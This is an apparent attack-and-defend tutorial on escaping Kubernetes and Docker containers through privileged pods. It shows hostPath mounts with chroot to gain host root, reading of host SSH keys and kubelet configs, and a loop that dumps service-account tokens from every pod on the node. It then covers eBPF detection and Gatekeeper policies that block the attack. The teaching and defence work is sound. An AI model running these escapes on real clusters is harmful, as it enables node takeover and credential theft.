Container Escape via Privileged Pod

Container Escape via Privileged Pod

A privileged container is the most dangerous misconfiguration in Kubernetes. It disables every container isolation mechanism — namespaces, cgroups, seccomp, AppArmor — and gives the process full access to the host kernel. An attacker who lands in a privileged pod can escape to the host in seconds.

This tutorial builds a complete attack-and-defend lab:

  1. Run a simple Docker escape locally to understand the mechanics
  2. Deploy a privileged pod in Kubernetes and escape via chroot
  3. Enumerate host secrets (SSH keys, kubeconfig, service accounts)
  4. Observe the entire attack with eBPF tracing
  5. Block the attack with Gatekeeper admission policies

Every step is self-contained — you can run the Docker examples with nothing but Docker installed.


Why Privileged Containers Are Dangerous

When a container runs with privileged: true, the kernel treats it almost identically to a host process:

Capability Normal container Privileged container
Kernel modules Blocked Can load modules
Device access Limited /dev Full /dev access
Mount filesystems Blocked Can mount host FS
Host PID namespace Isolated Sees all host processes
Host network Isolated Shares host network stack
Seccomp profile Applied Disabled
AppArmor/SELinux Applied Disabled

A privileged container + hostPID + host filesystem mount = root on the node.


Prerequisites

For the Docker-only examples:

# Just Docker
docker --version

For the Kubernetes lab:

# minikube or kind
minikube start
# or: kind create cluster

Part 1: Docker Escape — The Simple Version

Before touching Kubernetes, let's understand the escape mechanics with plain Docker.

Step 1: Run a privileged container with host filesystem

# Run a privileged container that mounts the host root filesystem
docker run --rm -it \
    --privileged \
    -v /:/host \
    alpine:3.18 /bin/sh

You're now inside a container, but /host is the host's root filesystem.

Step 2: Escape via chroot

# Inside the container:
chroot /host

# You are now effectively root on the host
whoami
# root

hostname
# Your host machine's hostname, NOT the container ID

cat /etc/hostname
# Your actual machine name

Step 3: Read host secrets

# SSH keys
ls -la /root/.ssh/

# Docker socket — can control all containers
ls -la /var/run/docker.sock

# All running processes (if --pid=host was used)
ps aux | head -20

# Exit back to container
exit
exit

That's it. Two commands: mount the host filesystem, chroot into it. This is why privileged: true is a critical finding in any security audit.

Step 4: Verify isolation without privileged

# Run a normal container (no --privileged, no host mount)
docker run --rm -it alpine:3.18 /bin/sh

# Try to access host filesystem
ls /host
# ls: /host: No such file or directory

# Try to mount a device
mount /dev/sda1 /mnt
# mount: permission denied (are you root?)

# Try to load a kernel module
insmod /lib/modules/test.ko
# insmod: can't insert 'test.ko': Operation not permitted

Without --privileged, the container is properly isolated.


Part 2: Kubernetes Escape

Now let's do this in Kubernetes, where the blast radius is much larger — you compromise not just a container, but potentially the entire cluster.

Step 1: Deploy a normal application pod

# Create a namespace for the lab
kubectl create namespace escape-lab

# Deploy a normal, unprivileged web app
cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: normal-app
  namespace: escape-lab
  labels:
    app: normal
spec:
  containers:
    - name: app
      image: alpine:3.18
      command: ["sleep", "infinity"]
      securityContext:
        readOnlyRootFilesystem: true
        runAsNonRoot: true
        runAsUser: 1000
        allowPrivilegeEscalation: false
EOF

kubectl wait --for=condition=Ready pod/normal-app -n escape-lab --timeout=30s

Verify it's properly isolated:

kubectl exec -n escape-lab normal-app -- whoami
# whoami: unknown uid 1000

kubectl exec -n escape-lab normal-app -- touch /tmp/test
# touch: /tmp/test: Read-only file system

kubectl exec -n escape-lab normal-app -- cat /etc/shadow
# cat: can't open '/etc/shadow': Permission denied

Step 2: Deploy the BishopFox-style attack pod

This pod has every dangerous flag enabled — this is what an attacker deploys after gaining create pods permission:

cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
  namespace: escape-lab
  labels:
    app: attack
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
    - name: attacker
      image: alpine:3.18
      securityContext:
        privileged: true
      volumeMounts:
        - mountPath: /host
          name: hostroot
      command: ["sleep", "infinity"]
  volumes:
    - name: hostroot
      hostPath:
        path: /
        type: Directory
EOF

kubectl wait --for=condition=Ready pod/attack-pod -n escape-lab --timeout=30s

Step 3: Escape to the host

# Enter the pod
kubectl exec -it -n escape-lab attack-pod -- /bin/sh

# Chroot to the host filesystem
chroot /host

# Verify — you're root on the Kubernetes node
whoami
# root

hostname
# The K8s node hostname

# Read the kubelet config
cat /etc/kubernetes/kubelet.conf 2>/dev/null || echo "Not a kubeadm cluster"

# List all pods (via host's kubelet)
crictl ps 2>/dev/null || docker ps

# Read node-level secrets
cat /var/lib/kubelet/config.yaml 2>/dev/null | head -20

# Exit
exit
exit

Step 4: Enumerate cluster secrets from the host

Once you have host access, you can steal service account tokens from every pod on the node:

kubectl exec -it -n escape-lab attack-pod -- /bin/sh -c '
echo "=== Service account tokens on this node ==="
find /host/var/lib/kubelet/pods -name "token" -type f 2>/dev/null | while read f; do
    echo "--- $f ---"
    cat "$f" | head -1
    echo ""
done
'

Each token can impersonate the pod's service account. If any pod has cluster-admin, the attacker owns the entire cluster.


Part 3: Observe with eBPF

On the Kubernetes node (or using a monitoring DaemonSet), observe the escape in real time:

Monitor chroot calls

sudo bpftrace -e '
tracepoint:syscalls:sys_enter_chroot {
    printf("CHROOT: pid=%d comm=%s dir=%s\n",
           pid, comm, str(args->filename));
}
'

When the attacker runs chroot /host, you'll see:

CHROOT: pid=45231 comm=chroot dir=/host

Monitor host filesystem access from containers

sudo bpftrace -e '
tracepoint:syscalls:sys_enter_openat
/ comm == "sh" || comm == "cat" || comm == "find" /
{
    printf("OPEN: pid=%d comm=%s file=%s\n",
           pid, comm, str(args->filename));
}
'

Monitor privilege escalation indicators

sudo bpftrace -e '
tracepoint:syscalls:sys_enter_mount {
    printf("MOUNT: pid=%d comm=%s source=%s target=%s\n",
           pid, comm, str(args->dev_name), str(args->dir_name));
}

tracepoint:syscalls:sys_enter_init_module {
    printf("KERNEL MODULE LOAD: pid=%d comm=%s\n", pid, comm);
}
'

Part 4: Block with Gatekeeper

ConstraintTemplate: Block privileged containers

# block-privileged-template.yaml
apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8sblockprivileged
spec:
  crd:
    spec:
      names:
        kind: K8sBlockPrivileged
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8sblockprivileged

        violation[{"msg": msg}] {
            c := input_containers[_]
            c.securityContext.privileged == true
            msg := sprintf(
                "Privileged container blocked: %v in %v",
                [c.name, input.review.object.metadata.name]
            )
        }

        input_containers[c] {
            c := input.review.object.spec.containers[_]
        }
        input_containers[c] {
            c := input.review.object.spec.initContainers[_]
        }

ConstraintTemplate: Block hostPath mounts

# block-hostpath-template.yaml
apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8sblockhostpath
spec:
  crd:
    spec:
      names:
        kind: K8sBlockHostPath
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8sblockhostpath

        violation[{"msg": msg}] {
            volume := input.review.object.spec.volumes[_]
            volume.hostPath
            msg := sprintf(
                "hostPath volume blocked: %v in %v",
                [volume.name, input.review.object.metadata.name]
            )
        }

Apply the constraints

kubectl apply -f block-privileged-template.yaml
kubectl apply -f block-hostpath-template.yaml

# Create constraints that enforce the templates
cat <<'EOF' | kubectl apply -f -
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sBlockPrivileged
metadata:
  name: no-privileged
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
    excludedNamespaces: [kube-system, gatekeeper-system]
---
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sBlockHostPath
metadata:
  name: no-hostpath
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
    excludedNamespaces: [kube-system]
EOF

Test — the attack pod should now be rejected

# Try to create the attack pod again
kubectl delete pod attack-pod -n escape-lab --ignore-not-found

cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: attack-pod-blocked
  namespace: escape-lab
spec:
  hostNetwork: true
  containers:
    - name: attacker
      image: alpine:3.18
      securityContext:
        privileged: true
      volumeMounts:
        - mountPath: /host
          name: hostroot
  volumes:
    - name: hostroot
      hostPath:
        path: /
EOF

# Expected output:
# Error: admission webhook denied the request:
# Privileged container blocked: attacker in attack-pod-blocked
# hostPath volume blocked: hostroot in attack-pod-blocked

Lab Cleanup

kubectl delete namespace escape-lab --ignore-not-found
kubectl delete constrainttemplate k8sblockprivileged k8sblockhostpath --ignore-not-found
kubectl delete k8sblockprivileged no-privileged --ignore-not-found
kubectl delete k8sblockhostpath no-hostpath --ignore-not-found

Next Steps